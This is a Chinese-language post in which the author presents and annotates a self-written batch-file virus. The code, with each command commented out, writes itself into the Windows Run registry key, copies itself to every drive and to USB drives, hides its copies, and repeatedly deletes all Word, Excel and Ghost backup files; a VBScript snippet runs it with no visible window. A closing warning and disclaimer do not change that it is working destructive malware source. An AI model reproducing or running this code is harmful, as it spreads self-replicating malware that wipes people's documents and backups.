非常危险,千万别用...
::病毒泛滥的今天,几乎所有的杀毒软件对批处理脚本都不感冒.
::这篇我来讲讲用批处理写的病毒(算是病毒吧,因为基本符合了计算机病毒的概念:计算机病毒是人为的特制程序,具有自我复制能力,具有感染性,一定的潜伏性,特定的触发性和很大的破坏性。).就算不能当成病毒,也是破坏性极大的恶性程序.
::下面是我写的一小段,别看这一小段,也基本具备了病毒的特性.我在每一句上都做了注释,解释它运行的原理.
::@echo off
::这句是将它自身加入启动项,计算机启动的时候它将随机器运行.
::reg add HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun /v windowsdir /t reg_sz /d "c:%~n0%~x0" /f>nul
::这句定义一个变量DRIVES为机器里面盘符.
::set drives=c d e f g h i j k l m n o p q r s t u v w x y z
::这句检测所有盘是否有自身这个文件,如果没有则把自身复制到这个盘,
::for %%a in (%drives%) do if exist %%a:%0 (echo>nul) else (copy %0 %%a:)
::这句是把所有盘的自身这个文件加上存档文件系统文件隐藏只读属性.
::for %%a in (%drives%) do attrib +a +s +h +r %%a:%~n0%~x0
::这句是一个标签,用于跳转的.
:usb
::这句是查找U盘,如果有U盘则把自身复制进去.如果在这时复制进去的是autorun.inf文件和自身,则实现了感染.
::关于传染性,只要有时间去写,实现网页传染局域网传染漏洞传染是一定可以实现的.
::for %%i in (%drives%) do (fsutil fsinfo drivetype %%i: | find "可移动驱动器">NUL && copy %0 %%i)
::这句可是破坏能力极大的一句了,删掉所有盘中的WORD,EXCEL和GHOST备份文档.当然,不仅仅是这点,只要去定义,删除任何文件都行.破坏性大吗?
::for %%i in (%drives%) do (del %%i:*.doc /f /s /q & del %%i:*.xls /f /s /q & del %%i:*.ghs /f /s /q)
::跳转到usb那个标签,重复的执行两句.
::goto:usb
::最后,因为批处理在运行是是有窗口的,不过可以通过调用VBS来实现它的隐藏运行.下面是VBS代码.
Set ws = CreateObject("Wscript.Shell")
ws.run "cmd /c 批处理程序名",vbhide
在此告诫大家,如果碰到陌生的批处理文件或可疑程序千万别去运行它.
声明:以上代码具有破坏性,如因以此代码所受到的损失本人概不负责.
登陆您的帐号 | 免费注册帐号